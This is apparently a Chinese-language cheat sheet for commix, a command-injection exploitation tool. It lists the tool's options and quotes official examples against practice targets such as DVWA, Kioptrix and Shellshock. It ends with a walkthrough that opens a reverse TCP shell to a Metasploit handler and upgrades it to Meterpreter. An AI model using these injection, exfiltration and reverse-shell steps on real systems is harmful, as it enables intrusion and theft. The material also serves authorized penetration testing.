commix

commix 是一款优秀的自动化命令注入漏洞利用工具。

常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# POST + COOKIE
commix -u "http://192.168.99.101/002/index.php?page=dns-lookup.php" --data "target_host=127.0.0.1|id&dns-lookup-php-submit-button=Lookup DNS" --cookie "showhints=1;username=admin; uid=1; PHPSESSID=a4e51899c9535d7f82f5eec85e445ebe"

# 使用request文件,同sqlmap
commix -r reqfile

# 爬虫模式,指定爬虫深度 1-2, 默认0
commix --crawl=1

# 通过sitemap检测
commix -x sitemap_url

# 增加其他http头
--host
--referer
--useragent
--random-agent # 随机user-agent
--cookie

# 代理
--proxy PROXY
--tor
--tor-port

# 需要登录认证时的配置
--auth-url 登录url
--auth-data 登录data
# HTTP基础认证
--auth-type HTTP基础认证类型 'BASIC''Digest'
--auth-cred HTTP认证信息 e.g. 'admin:admin'

# 忽略的response status_code
--ignore-code 401
# 忽略跳转
--ignore-redirects

# 超时的时候,最大尝试次数
--retries

# 强制ssl
--force-ssl

# 指定编码类型
--encoding GBK

记录测试结果

1
2
3
4
5
6
7
8
9
10
--output-dir

# 从session_file(.sqlite文件)中载入会话
-s SESSION_FILE

# 刷新目标相关的会话数据
--flush-session

# 忽略所有session_file记载的结果,即此次扫描与历史数据无关
--ignore-session

获取系统信息

1
2
3
4
5
6
7
8
9
10
11
--all 获取所有信息
--current-user
--hostname
--is-root
--is-admin
--sys-info
--users
--passwords
--privileges
# powershell 版本
--ps-version

文件操作

1
2
3
4
5
--file-read
--file-write
--file-upload
# 指定写入或者上传之后保存的绝对路径
--file-dest

指定测试参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# 指定测试参数
-p

# 跳过指定参数
--skip

# HTTP requests间隔秒数
--delay

# 指定一个os-shell 比如 python
--alter-shell 'python'

# 指定执行的命令
--os-cmd id

# 指定网站根目录
--web-root /var/www

# 指定tmp目录
--tmp-path /tmp

# 指定目标操作系统
--os 'Windows' or 'Unix'

# 指定tamper脚本,可以用于绕过waf
--tamper

跳过一些测试项

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# 测试等级 1-3 默认 1
--level

# 跳过数学计算
--skip-calc

# 跳过参数空值测试
--skip-empty

# 最大失败尝试次数
--failed-tries 5

# 检测依赖模块
--dependencies

# 列出所有tamper脚本,类似sqlmap tamper
--list-tampers

# 安全地移除所有commix数据
--purge

# 跳过检测waf
--skip-waf

# 使用移动端 user-agent
--mobile

# 离线模式
--offline

# 为新手准备的向导模式,一种交互模式,按提示输入一个个参数
--wizard

# 禁止多色输出
--disable-coloring

官方例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
Usage Examples
Cat0x00 edited this page on 20 Mar 2019 · 26 revisions
1. Exploiting Damn Vulnerable Web App:
[email protected]:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
[email protected]:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
[email protected]:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:
[email protected]:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:
[email protected]:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):
[email protected]:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
[email protected]:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:
[email protected]:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:
[email protected]:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:
[email protected]:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:
[email protected]:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:
[email protected]:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:
[email protected]:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
[email protected]:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

get metasploit shell

commix注入成功会自动获取一个Pseudo-Terminal,默认为os_shell模式,显示有点问题,不如metasploit好用。

前提是指定--msf-path metasploit安装路径,获取Pseudo-Terminal之后,通过命令与metasploit联动:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# 执行之前启动 metasploit exploit/multi/handler
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.99.103:4444

# 反弹tcp shell,还有一种 bind_tcp shell
commix(os_shell) > reverse_tcp

commix(os_shell) > set LHOST 192.168.99.103

commix(os_shell) > set LPORT 4444

---[ Unix-like reverse TCP shells ]---
Type '1' to use a PHP reverse TCP shell.
Type '2' to use a Perl reverse TCP shell.
Type '3' to use a Ruby reverse TCP shell.
Type '4' to use a Python reverse TCP shell.
Type '5' to use a Socat reverse TCP shell.
Type '6' to use a Bash reverse TCP shell.
Type '7' to use a Ncat reverse TCP shell.

---[ Windows reverse TCP shells ]---
Type '8' to use a PHP meterpreter reverse TCP shell.
Type '9' to use a Python reverse TCP shell.
Type '10' to use a Python meterpreter reverse TCP shell.
Type '11' to use a Windows meterpreter reverse TCP shell.
Type '12' to use the web delivery script.

# 开始回连
commix(reverse_tcp_other) > 4
[+] Everything is in place, cross your fingers and wait for a shell!

# handler 成功获得shell
[*] Command shell session 1 opened (192.168.99.103:4444 -> 192.168.99.101:49036) at 2020-02-24 16:35:33 +0800

$ whoami
www-data

$ background

# 升级到 meterpreter
msf5 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run

[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.99.103:4433
[*] Sending stage (985320 bytes) to 192.168.99.101
[*] Meterpreter session 2 opened (192.168.99.103:4433 -> 192.168.99.101:59582) at 2020-02-24 17:00:18 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 shell python/python /bin/sh: 0: can't access tty; job control turned off $ 192.168.99.103:4444 -> 192.168.99.101:49036 (192.168.99.101)
2 meterpreter x86/linux uid=33, gid=33, euid=33, egid=33 @ 192.168.99.101 192.168.99.103:4433 -> 192.168.99.101:59582 (192.168.99.101)